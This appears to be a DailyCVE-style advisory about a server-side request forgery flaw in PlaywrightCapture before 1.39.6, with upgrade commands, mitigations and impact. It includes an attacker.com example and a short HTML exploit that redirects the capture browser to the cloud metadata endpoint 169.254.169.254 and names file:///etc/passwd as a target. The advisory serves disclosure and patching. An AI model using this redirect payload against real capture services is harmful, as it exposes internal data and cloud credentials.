Listen to this Post
The vulnerability arises because PlaywrightCapture does not sufficiently restrict navigations and resource requests that are initiated by the captured web pages. An attacker who can control the content of a page (e.g., by providing a malicious URL) can abuse browser-side redirections. By using a mechanism such as window.location.href, the attacker forces the capture process to navigate to a `file://` URL. This could be, for example, `file:///etc/passwd` to read local system files. Furthermore, the attacker can cause the capture process to send requests to internal network addresses, such as http://localhost:8080/admin` orhttp://192.168.1.1`. The PlaywrightCapture engine, acting as a client, would follow these redirects and make the secondary request. Crucially, the original validation logic only checked the initially submitted URL, not the subsequent ones. This allows a Server-Side Request Forgery (SSRF) attack, where an external attacker can make the internal capture service interact with, and potentially extract data from, internal services, cloud metadata endpoints, or the local filesystem. The responses from these internal or local resources can then be leaked back to the attacker via the capture artifacts, such as screenshots of the rendered page, saved HTML content, or debug logs. The patch addresses this by introducing request routing checks that block any secondary requests targeting local files, non-global IP addresses (like private, loopback, or link-local ranges), and `.local` domains when the `only_global_lookup` option is enabled, while still allowing the originally intended capture URL.
DailyCVE Form
Platform: PlaywrightCapture
Version: <1.39.6
Vulnerability: SSRF (Server-Side)
Severity: Medium
date: 2026-04-30
Prediction: 2026-05-01
What Undercode Say:
Administrators should update to the patched release immediately. Use the following commands to verify the installed version and upgrade the package.
Check current version pip show playwrightcapture | grep Version Upgrade to the patched version (1.39.6 or later) pip install --upgrade playwrightcapture>=1.39.6
The root cause is the failure to validate redirect targets. The following simplified Python example demonstrates the insecure behavior (pre-patch) has no route validation on the redirected URL:
Vulnerable pre-1.39.6 implementation (for demonstration) from playwrightcapture import Capture capture = Capture() Attacker's page that redirects to localhost malicious_url = "https://attacker.com/redirect_to_localhost.html" result = capture.run(malicious_url) The engine would fetch http://localhost:8080
Exploit:
An attacker can host a simple HTML page at a URL provided to the PlaywrightCapture service. The page contains a client-side redirection:
<!-- save as exploit.html and serve via any HTTP server --> <!DOCTYPE html> <html> <head> <script> // Redirect to internal service (e.g., cloud metadata endpoint) window.location.href = "http://169.254.169.254/latest/meta-data/"; </script> </head> <body>Redirecting...</body> </html>
When PlaywrightCapture processes this URL, the browser inside the capture environment follows the redirect and makes a request to the internal IP address. If the capture service returns the content as part of a screenshot or log, the attacker can retrieve sensitive information.
Protection from this CVE
The primary protection is to upgrade to PlaywrightCapture version 1.39.6 or later, which includes the request routing checks. If upgrading is not immediately possible, mitigate the risk by:
– Avoiding the processing of untrusted URLs.
– Enabling the `only_global_lookup` flag in the capture configuration (this is the default in patched versions).
– Implementing a strict outbound network policy for the capture environment to block all requests to private IP ranges and `file://` URIs.
– Disabling and closely monitoring the saving of verbose capture artifacts (screenshots, logs, HTML output) that could leak internal data.
Impact
A successful exploit allows a remote attacker to bypass network restrictions and perform Server-Side Request Forgery (SSRF) attacks on the internal PlaywrightCapture service. The attacker could:
– Read arbitrary local files from the capture server, such as /etc/passwd, configuration files, source code, or data files.
– Probe and interact with internal services (e.g., internal HTTP APIs, cloud metadata endpoints, databases) that are not accessible from the internet. This could lead to further compromise of the internal infrastructure.
– Leak sensitive information obtained from local files or internal services through the capture outputs, including screenshots, saved page source, or logs.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
